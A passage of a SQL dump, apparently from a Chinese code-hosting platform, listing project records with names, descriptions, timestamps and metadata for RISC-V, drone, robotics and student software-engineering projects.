','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2020-02-01 22:24:23','2020-08-07 10:46:50','risc-v2',1,147,148,0,0,0,1,75,0,NULL,NULL,NULL,168,232,NULL,0,40,0,NULL,NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(254,'Test project','#Test#\nThis is a demo project.','',0,NULL,'2020-02-02 23:36:38','2020-08-07 10:46:50','test_project',1,149,150,0,0,0,1,77,0,NULL,NULL,NULL,169,NULL,NULL,0,22,0,'S627MY',NULL,0,NULL,0,NULL,20,NULL,11,119,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(255,'micROS','#micROS#\nThis is a demo project.','',0,NULL,'2020-02-03 12:08:29','2020-08-07 10:46:50','ixbYFZRsL',1,151,152,0,0,0,1,77,0,NULL,NULL,NULL,170,NULL,NULL,0,756,0,'5TJ2WA',NULL,0,NULL,0,NULL,16,NULL,11,119,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(256,'代码克隆检测','这是一个测试代码克隆检测的项目','',0,NULL,'2020-02-03 16:57:11','2020-08-07 10:46:52','cloneworks',1,153,154,0,0,0,1,55,0,NULL,NULL,NULL,171,NULL,NULL,0,46,0,'LTM4S2',NULL,0,NULL,0,NULL,20,NULL,1,6,0,0,0,0,'Python',0,0,0,0,NULL,0,0,0),(257,'代码克隆检测2','测试版本库国内功能','',0,NULL,'2020-02-03 17:36:28','2020-08-07 10:46:53','myclones',1,155,156,0,0,0,1,78,0,NULL,NULL,NULL,172,NULL,NULL,0,31,0,'PWEB4V',NULL,0,NULL,0,NULL,20,NULL,1,NULL,0,0,0,0,'Python',0,0,0,0,NULL,0,0,0),(258,'Hnice','hnice good','',1,NULL,'2020-02-03 17:45:42','2020-08-07 10:46:53','hinice',1,157,158,0,0,0,1,48,0,NULL,NULL,NULL,173,NULL,NULL,0,26,0,'OSA5Z3',NULL,0,NULL,0,NULL,16,NULL,1,NULL,0,0,0,0,'Scala',0,0,0,0,NULL,0,0,0),(261,'opensbi','# Mirror Repo for OpenSBI\n\norigin url: https://github.com/riscv/opensbi.git\n','',0,NULL,'2020-02-10 12:26:21','2020-08-17 03:39:36','opensbi',1,161,162,0,0,0,1,103,0,NULL,NULL,NULL,175,NULL,NULL,0,70,0,NULL,NULL,0,NULL,0,NULL,16,33,4,117,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(262,'meta-riscv','','',0,NULL,'2020-02-10 15:22:56','2020-08-17 03:38:01','meta-riscv',1,163,164,0,0,0,1,103,0,NULL,NULL,NULL,176,NULL,NULL,0,53,0,NULL,NULL,0,NULL,0,NULL,16,33,8,117,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(263,'riscv-tools','','',0,NULL,'2020-02-10 15:24:55','2020-08-07 10:46:55','riscv-tools',1,165,166,0,0,0,1,103,0,NULL,NULL,NULL,177,NULL,NULL,0,9,0,NULL,NULL,0,NULL,0,NULL,16,33,12,117,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(264,'riscv-gnu-toolchain','','',0,NULL,'2020-02-10 15:37:24','2020-08-07 10:46:55','riscv-gnu-toolchain',1,167,168,0,0,0,1,103,0,NULL,NULL,NULL,178,NULL,NULL,0,15,0,NULL,NULL,0,NULL,0,NULL,16,34,12,117,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(265,'hello','','',0,NULL,'2020-02-11 09:18:05','2020-08-07 10:46:56','hello',1,169,170,0,0,0,1,103,0,NULL,NULL,NULL,179,NULL,NULL,0,44,0,NULL,NULL,0,NULL,0,NULL,20,NULL,8,117,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(266,'repo_demo','# Repo Demo\n\nThis is a simple test.','',1,NULL,'2020-02-11 09:30:09','2020-08-07 10:46:56','repo_demo',1,171,172,0,0,0,1,103,0,NULL,NULL,NULL,180,NULL,NULL,0,72,0,'S2P485',NULL,0,NULL,0,NULL,20,NULL,8,52,0,0,0,0,'Python',0,0,0,0,NULL,0,0,0),(267,'sequelize','','',0,NULL,'2020-02-11 09:39:11','2020-08-17 03:24:53','sequelize',1,173,174,0,0,0,1,55,0,NULL,NULL,NULL,181,NULL,NULL,0,16,0,NULL,NULL,0,NULL,0,NULL,13,8,1,NULL,0,0,0,0,'PHP',0,0,0,0,NULL,0,0,0),(268,'quickd','','',1,NULL,'2020-02-11 09:40:38','2020-08-17 03:40:55','quickd',1,175,176,0,0,0,1,47,0,NULL,NULL,NULL,182,NULL,NULL,0,80,0,NULL,NULL,0,NULL,0,NULL,11,11,1,NULL,0,0,3,0,'TeX',1,0,0,0,NULL,0,0,0),(269,'基于RISCV指令集的嵌入式低功耗芯片2','RISC-V(发音为“risk-five”)是一个基于精简指令集(RISC)原则的开源指令集架构(ISA)。与大多数指令集相比,RISC-V指令集可以自由地用于任何目的,允许任何人设计、制造和销售RISC-V芯片和软件。虽然这不是第一个开源指令集,但它具有重要意义,因为其设计使其适用于现代计算设备(如仓库规模云计算机、高端移动电话和微小嵌入式系统)。','',1,NULL,'2020-02-11 09:46:46','2020-08-17 02:30:09','risc-v2',1,177,178,0,0,0,1,47,0,NULL,NULL,NULL,183,232,1,0,56,0,NULL,NULL,0,NULL,0,NULL,16,34,1,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(270,'这是托管项目的测试','这是托管项目的测试这是托管项目的测试这是托管项目的测试','',0,NULL,'2020-02-11 10:06:32','2020-08-07 10:46:58','UgmxntjSV',1,179,180,0,0,0,1,47,0,NULL,NULL,NULL,184,NULL,NULL,0,27,0,NULL,NULL,0,NULL,0,NULL,17,NULL,1,NULL,0,0,0,0,'TeX',0,0,0,0,NULL,0,0,0),(271,'orange',NULL,'',0,NULL,'2020-02-11 11:10:56','2020-08-07 10:46:58','orange',1,181,182,0,0,0,1,47,0,NULL,NULL,NULL,185,NULL,NULL,0,2,0,NULL,NULL,0,NULL,0,NULL,19,NULL,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(272,'团队协同开发','团队协调开发提交代码,共享文件,协同开发','',0,NULL,'2020-03-09 10:22:40','2020-08-17 02:25:56','master',1,183,184,0,0,0,1,80,0,NULL,NULL,NULL,186,251,NULL,0,3,0,NULL,NULL,0,NULL,0,NULL,8,33,11,119,0,0,0,0,'C++',0,0,0,0,NULL,0,0,0),(273,'马赛克战理论研究协同攻关','马赛克战理论研究协同攻关','',1,NULL,'2020-03-14 09:33:12','2020-08-07 10:46:59','Tncejizko',1,185,186,0,0,0,1,51,0,NULL,NULL,NULL,187,NULL,NULL,0,96,0,NULL,NULL,0,NULL,0,NULL,17,33,1,NULL,0,0,0,0,'TeX',0,0,0,0,NULL,0,0,0),(274,'CCR','demo','',1,NULL,'2020-03-27 19:19:54','2020-08-07 10:47:00','mluqNjgZQ',1,187,188,0,0,0,1,45,0,NULL,NULL,NULL,188,NULL,NULL,0,46,0,NULL,NULL,0,NULL,0,NULL,9,NULL,13,NULL,0,0,0,0,'C',0,0,0,0,NULL,0,0,0),(306,'BigDir','测试大文件提交','',1,NULL,'2015-11-03 08:27:13','2020-08-12 08:54:44','bigdir',1,1557,1558,0,0,0,1,51,0,NULL,NULL,1,210,NULL,0,0,59496,0,'NOCHDA',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(307,'Bench4Q',' Bench4Q is a Cloud-Based software','',1,NULL,'2013-08-26 09:08:16','2020-08-12 08:53:51','bench4q',1,91,92,0,0,0,1,34,0,NULL,NULL,1,12,NULL,0,0,854694,1,'KLWRHF',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(308,'Training Project','实训项目服务器端代码<br />','',1,NULL,'2017-02-27 13:58:01','2020-08-12 08:54:09','training_project',1,5035,5036,0,0,0,1,49,0,NULL,NULL,NULL,212,NULL,0,0,72937,0,'HJLQVK',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(309,'Trustie云','','',1,NULL,'2017-01-19 17:16:52','2020-08-12 08:53:51','edudsj',1,4805,4806,0,0,0,1,61,0,NULL,NULL,NULL,2257,NULL,0,0,76812,0,'GLCD6P',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(310,'EduCoderPlus_Mobile1.0 ','','',1,NULL,'2019-09-16 16:11:45','2020-08-12 08:57:46','educodermobile',1,11063,11064,0,0,0,1,46,0,NULL,NULL,NULL,214,NULL,0,0,2051,0,'5PTKD6',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(311,'SrcML项目','项目来源https://github.com/abb-iss/SrcML.NET','',1,NULL,'2017-06-03 14:52:44','2020-08-12 08:57:46','swum',1,6319,6320,0,0,0,1,56,0,NULL,NULL,NULL,215,NULL,0,0,22691,0,'8MKFDV',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(312,'社区--Openi','openi启智','',1,NULL,'2019-02-18 14:21:16','2020-08-12 08:57:45','openinew',1,10649,10650,0,0,0,1,37,0,NULL,NULL,NULL,5075,NULL,0,0,79980,0,'WTAD2S',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(313,'虚拟专云','这是一个虚拟专云项目','',1,NULL,'2016-08-08 13:00:00','2020-08-12 08:57:50','docklet',1,3309,3310,0,0,0,1,66,0,NULL,NULL,1,217,NULL,0,0,19702,0,'JL2XBQ',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(314,'Trustie-OSSEAN','This project is to build an platform for OSS Evaluating, Analying and Networking. This project uses webmagic framework and many open source data analysis tools for monitoring and mining open source software community data.','',1,NULL,'2018-06-11 10:17:45','2020-08-12 08:57:45','ossean',1,9245,9246,0,0,0,1,10,0,NULL,NULL,NULL,4466,NULL,0,0,25637,0,'UKSDCV',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(315,'社区 --上海版','上海交大','',1,NULL,'2018-12-17 10:13:47','2020-08-12 08:57:45','shos',1,10529,10530,0,0,0,1,46,0,NULL,NULL,NULL,5020,NULL,0,0,45431,0,'3KRZU6',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(316,'sagecal','','',1,NULL,'2018-11-22 23:18:22','2020-08-12 08:58:22','sagecal',1,10477,10478,0,0,0,1,38,0,NULL,NULL,NULL,220,NULL,0,0,17781,0,'FAPWZM',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(317,'云平台—汇总平台后端','','',1,NULL,'2018-01-11 09:41:55','2020-08-12 08:57:45','data_aggregation_backend',1,7789,7790,0,0,0,1,90,0,NULL,NULL,NULL,3747,NULL,0,0,25077,0,'HSD3CQ',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(318,'haflow','Hadoop has become the defacto standard of big data analysis, due to its scalability, fault-tolerance and availability. However, using Hadoop is still a non-trivial task; difficulties, like unfriendly interfaces, heterogeneous but isolated tools, make data analysis on Hadoop a tedious work. The goal of this topic is to design and implement a flexible web based tool facilitating big data analysis using Hadoop. The contesters are required to fulfill the following tasks: (1) Build web user interface for HDFS file management and Hive table management. (2) Integration open source data mining tools, like weka, Mahout etc. Develop a drag and drop based web user interface for developing big data analysis applications with these functions. (3) Implement web based report charts design interface.','',1,NULL,'2014-08-18 12:50:44','2020-08-12 09:07:29','haflow',1,37,38,0,0,0,1,46,0,NULL,NULL,1,274,NULL,0,0,174769,0,'G9N6YW',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(319,'多无人机联合搜索系统——searchers','基站控制无人机群,高效搜索灾区。','',1,NULL,'2016-11-06 08:30:50','2020-08-12 09:02:58','abejas',1,4087,4088,0,0,0,1,84,0,NULL,NULL,NULL,266,NULL,0,0,56034,0,'W2SYFB','gQEc8DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyRlA2Zzl5SzU5Yl8xWnVMY3hvMXYAAgReYqVYAwQAjScA',1489825630,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(320,'多无人机联合搜索系统——searchers','基站控制无人机群,高效搜索灾区。','',1,NULL,'2017-06-15 10:23:25','2020-08-12 08:58:56','DnlKbrZSH',1,6359,6360,0,0,0,1,50,0,NULL,NULL,NULL,229,NULL,0,0,2564,0,'CBS9XU',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(321,'SGX虚拟机动态跨云迁移','SGX虚拟机动态跨云迁移开源项目','',1,NULL,'2019-07-09 11:26:03','2020-08-12 08:58:23','enclave_migration',1,10833,10834,0,0,0,1,108,0,NULL,NULL,NULL,222,NULL,0,0,6115,0,'BN7FXT',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(322,'空巢老人看护系统Elderly Carer','<p style=\"text-align:center;\">\r\n 基于自主机器人和智能手机的空巢老人看护系统--Elderly Carer\r\n</p>\r\n<p>\r\n <br />\r\n</p>\r\n<p class=\"MsoNormal\" align=\"left\" style=\"text-indent:21pt;\">\r\n 随着人口老龄化问题越来越严重,空巢老人的无人看护将成为一个亟待解决的社会难题。家属外出工作时,经常会惦记独自在家的老人,希望掌握老人的状况(比如:身体状态如何?在做什么?)。但是由于空间距离上的限制,家属不能方便快捷的获取这些信息;很多老年人不会或者不方便使用手机,造成家属与老人之间语音通话上的困难;老年人记忆力普遍衰退,容易忘记服药等一些重要的事情,家属外出时无人监督老人完成这些事情。对于一些患有疾病的老人来说,忘记服药很可能会造成危险;当老人独自在家时,他们可能会遇到摔倒或者中风等突发情况,而外出工作的家属和医疗救护人员不能及时掌握这些危险信息,导致救援不及时。<span></span> \r\n</p>\r\n<p class=\"MsoNormal\" align=\"left\" style=\"text-indent:21pt;\">\r\n 本软件专为解决空巢老人的看护问题而设计,它可以帮助用户(老人的家属)监控老人在家的状况,帮助老人与家人语音聊天,提醒并监督老人按时服药,并在发生危险时向用户警报或者联系急救部门。<span></span> \r\n</p>\r\n<p>\r\n <br />\r\n</p>','',1,NULL,'2019-10-09 09:00:16','2020-08-12 08:59:23','se15',1,11247,11248,0,0,0,1,24,0,NULL,NULL,NULL,232,NULL,0,0,2798,0,'4P6UMN',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(323,'自组织无人机群地震搜救系统 邱昊中、张国锋、王建新、刘溯源 ','','',1,NULL,'2018-10-10 16:27:13','2020-08-12 08:57:46','software_engineering',1,10197,10198,0,0,0,1,34,0,NULL,NULL,NULL,4866,NULL,0,0,27708,0,'RZM987','gQFH8DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyUUJmQzlOSzU5Yl8xbHF2bU51MVQAAgRa0i5eAwQAjScA',1582718810,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(324,'软工突击队——导盲杖','','',1,NULL,'2016-11-06 23:20:51','2020-08-12 08:57:46','software',1,4135,4136,0,0,0,1,30,0,NULL,NULL,NULL,1922,NULL,0,0,11838,0,'JFP7MV',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(325,'Baby\'s Escort','每时每刻都会守护在孩子身边','',1,NULL,'2017-09-01 22:35:50','2020-08-12 08:57:46','software_program',1,6677,6678,0,0,0,1,37,0,NULL,NULL,NULL,3192,NULL,0,0,25974,0,'P3DR7U',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(326,'course','','',1,NULL,'2015-09-20 18:14:31','2020-08-12 09:00:53','finalproject',1,1275,1276,0,0,0,1,15,0,NULL,NULL,NULL,254,NULL,0,0,10879,0,'BFSCU5',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(327,'图书馆自主借书机器人','','',1,NULL,'2016-12-17 10:37:57','2020-08-12 08:59:24','robot',1,4621,4622,0,0,0,1,45,0,NULL,NULL,NULL,233,NULL,0,0,15590,0,'YNF39B',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(328,'“在这里”校园信息集成平台','组长:王尚文\r\n组员:赵再春 徐航 覃佳明 许家铭','',1,NULL,'2018-05-18 10:42:33','2020-08-12 08:58:22','shangwen666',1,8971,8972,0,0,0,1,3,0,NULL,NULL,1,4329,NULL,0,0,9012,0,'S32RT4',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(329,'软件资源分析','','',1,NULL,'2019-12-10 09:01:39','2020-08-12 08:58:22','rscbound',1,11651,11652,0,0,0,1,99,0,NULL,NULL,NULL,5562,NULL,1,0,1911,0,'XDSGMQ','gQHy8DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyYmE1RDkwSzU5Yl8xNUJfbU51MVoAAgRl8u5dAwQAjScA',1578532709,NULL,0,NULL,8,2,1,1,0,0,1,0,NULL,0,0,0,0,NULL,0,0,0),(330,'基于多无人协同的森林火灾检测系统 杨智业、黄仁杰、肖朝','','',1,NULL,'2018-09-30 19:53:19','2020-08-12 09:00:13','banbenku',1,9971,9972,0,0,0,1,67,0,NULL,NULL,NULL,240,NULL,0,0,10962,0,'2XUOD9',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(331,'CSU2019电子商务18','','',1,NULL,'2020-03-13 18:00:52','2020-08-17 02:25:39','compkey',1,11823,11824,0,0,0,1,56,0,NULL,NULL,NULL,5648,NULL,0,0,1705,0,'TLJZGP',NULL,0,NULL,0,NULL,10,11,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(332,'nudtSE_project_erp','','',1,NULL,'2019-12-03 16:34:56','2020-08-12 08:58:46','erp',1,11613,11614,0,0,0,1,55,0,NULL,NULL,NULL,225,NULL,0,0,1313,0,'HRJFPG',NULL,0,NULL,0,NULL,8,11,1,59,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(333,'嗖藏','','',1,NULL,'2017-09-01 22:11:16','2020-08-12 08:59:12','basketball',1,6673,6674,0,0,0,1,6,0,NULL,NULL,NULL,226,NULL,0,0,18356,0,'SPB63Y',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(334,'小米便签的阅读、分析、标注与维护(吴子吉+方群天)','','',1,NULL,'2019-08-26 10:56:52','2020-08-12 08:58:45','minote',1,10975,10976,0,0,0,1,7,0,NULL,NULL,NULL,5227,NULL,0,0,6823,0,'GANH3O',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(335,'sslab','这是cute minion的项目。<br />','',1,NULL,'2018-05-09 13:48:40','2020-08-12 09:05:07','sslab',1,8935,8936,0,0,0,1,41,0,NULL,NULL,NULL,273,NULL,0,0,1208,0,'5B289L',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(336,'基于AR的3D地图导航','本软件由第五小组负责开发。主要面向于用户,为科大师生提供一种新的导航方式,能够通过摄像头来识别眼前的三维事物。\r\n普通用户可以借助该软件实现普通地图拥有的所有功能;可以使用软件的三维视图功能,图象识别匹配功能,信息搜索匹配功能,标签显示功能以及三维路线规划功能;\r\n管理员可以对数据库进行修改,添加新地图库信息。 ','',1,NULL,'2017-03-04 14:04:35','2020-08-12 08:58:45','3dnudtmap',1,5261,5262,0,0,0,1,76,0,NULL,NULL,NULL,2485,NULL,0,0,18277,0,'4O9S3W',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(337,'ambition','','',1,NULL,'2016-11-16 21:19:26','2020-08-12 08:58:55','ambition',1,4331,4332,0,0,0,1,51,0,NULL,NULL,NULL,228,NULL,0,0,7315,0,'HQZYD6',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(338,'lab5','','',1,NULL,'2018-05-26 19:44:24','2020-08-12 09:00:28','lab5',1,9053,9054,0,0,0,1,16,0,NULL,NULL,NULL,248,NULL,0,0,590,0,'KO7TQ3',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(339,'智能家居看护预警机器人——姚相东、张璋、江啸、李奕组','智能家居看护预警机器人——姚相东、张璋、江啸、李奕组','',1,NULL,'2016-09-12 19:45:04','2020-08-12 09:00:25','bus_project',1,3461,3462,0,0,0,1,104,0,NULL,NULL,1,247,NULL,0,0,15696,0,'5YUR9N',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(340,'优答','<p>\r\n 文档设计\r\n</p>\r\n<p>\r\n <a href=\"http://note.youdao.com/noteshare?id=66fdf3f8c69cabc684a74a9a1d5e5622\" target=\"_blank\">详情</a>\r\n</p>','',1,NULL,'2018-01-22 14:53:37','2020-08-12 09:00:05','uask',1,7807,7808,0,0,0,1,104,0,NULL,NULL,NULL,235,NULL,0,0,20608,0,'U64L2G',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(341,'基于P2P的音频共享APP','组员:\r\n杨顺云\r\n张志通\r\n张迅晖','',1,NULL,'2016-03-20 12:54:29','2020-08-12 09:00:14','songp2p',1,2789,2790,0,0,0,1,15,0,NULL,NULL,NULL,241,NULL,0,0,32228,0,'QYVW6R',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(342,'Baby安全助手','','',1,NULL,'2017-04-07 23:49:02','2020-08-12 08:58:56','ruangongchuangxinshijian',1,5739,5740,0,0,0,1,29,0,NULL,NULL,NULL,2724,NULL,0,0,5414,0,'8RAEX9',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(343,'云平台-汇总平台前端','','',1,NULL,'2019-01-16 15:54:10','2020-08-12 08:59:23','aggregation-platform',1,10599,10600,0,0,0,1,97,0,NULL,NULL,NULL,5053,NULL,0,0,20305,0,'PK5842','gQEh8DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyb0VmMDlySzU5Yl8xTFI5dHhzMUoAAgT1PHZcAwQAjScA',1553844725,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(344,'Sky Guard','通过哨兵无人机劫持敌机的软件','',1,NULL,'2017-03-07 21:16:03','2020-08-12 08:59:23','skyguard',1,5317,5318,0,0,0,1,21,0,NULL,NULL,NULL,2513,NULL,0,0,4362,0,'SCTJDY',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(345,'Past-Headlines','<p>\r\n Past headlines website offers visitors not-up-to-the-minute news.\r\n</p>','',1,NULL,'2018-10-27 15:43:15','2020-08-12 08:59:57','past-headlines',1,10363,10364,0,0,0,1,76,0,NULL,NULL,NULL,237,NULL,0,0,883,0,'A63TJK',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(346,'FindJob','','',1,NULL,'2019-10-22 20:26:08','2020-08-12 09:00:44','findjob',1,11391,11392,0,0,0,1,39,0,NULL,NULL,NULL,252,NULL,0,0,1083,0,'5LH6EO',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(347,'2048Game','','',1,NULL,'2018-05-19 14:24:37','2020-08-12 09:00:19','2048jsgame',1,8991,8992,0,0,0,1,86,0,NULL,NULL,NULL,245,NULL,0,0,9356,0,'T5UZNE',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(348,'robocode机器人战斗模拟','','',1,NULL,'2015-12-13 23:42:15','2020-08-12 09:00:39','app',1,1781,1782,0,0,0,1,40,0,NULL,NULL,NULL,239,NULL,0,0,128823,0,'AN4C68',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(349,'Pnote——个人笔记助理','<p class=\"p\" style=\"text-indent:28.0000pt;\">\r\n <span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>随着互联网的普及、信息流通的速度、强度和便捷度的加强,一方面信息化让电子文档、纸质文档、</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>图片</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>、多媒体</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>等</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>文件成为了</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>学校、公司、</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>企业智慧资产的主要载体</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>,</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>人们享受到了前所未有的方便和迅捷</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>。</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>但另一方面也承受着信息爆炸所带来的压力</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>,人们</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>平均每天浪费很多的时间在无效的文档管理上</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>,</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>文档的丢失、无意间的删除以及多版本造成的混乱都严重影响了工作效率。</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>比如对于程序员这个特定的群体而言,工作中自然少不了对大量开发程序、项目文档、开发经验、技术收藏、常用脚本和命令等文档的</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>记录</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>。</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>本软件基于</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\">Python编程语言</span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>,采用BS架构,将</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>记笔记、知识库、工具箱、和日历待办事项等功能集成一体,旨在</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>开发一款简约、轻便</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>、多功能</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>的</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>个人笔记助手</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>,</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"><span>以此促进人们的个人学习、成长、总结和提高,成为不可或缺的工作伙伴。</span></span><span style=\"font-family:仿宋;color:#333333;font-size:14.0000pt;\"></span> \r\n</p>','',1,NULL,'2018-11-27 13:10:33','2020-08-12 08:59:24','pnote',1,10485,10486,0,0,0,1,36,0,NULL,NULL,NULL,4999,NULL,0,0,8092,0,'QK3G9S',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'python',0,0,0,0,NULL,0,0,0),(350,'V-Travel','<p>\r\n 发布网站:https://desolate-shore-97364.herokuapp.com/\r\n</p>\r\n<p>\r\n <p class=\"MsoNormal\">\r\n 项目的目的:把用户选择的纪录片按照地点串连成路线,并显示在地图上,用户可以沿着这样的路线点击和观赏纪录片,给用户一种虚拟旅行的体验。\r\n </p>\r\n</p>','',1,NULL,'2017-11-16 18:08:06','2020-08-12 09:00:15','v-travel',1,7587,7588,0,0,0,1,97,0,NULL,NULL,NULL,238,NULL,0,0,2719,0,'ATKOFB',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(351,'小米便签精读 第一大组','小米精读','',1,NULL,'2015-10-31 09:04:52','2020-08-12 09:00:17','xiaomi',1,1535,1536,0,0,0,1,39,0,NULL,NULL,NULL,243,NULL,0,0,57464,1,'6ZCXWJ',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(352,'A better sandbox for BtrPlace (Entropy)','Btrplace is the flexible VM placement algorithm inside Entropy. It allows to compute the VMs placement, the servers\' state, the resource allocation with regards to 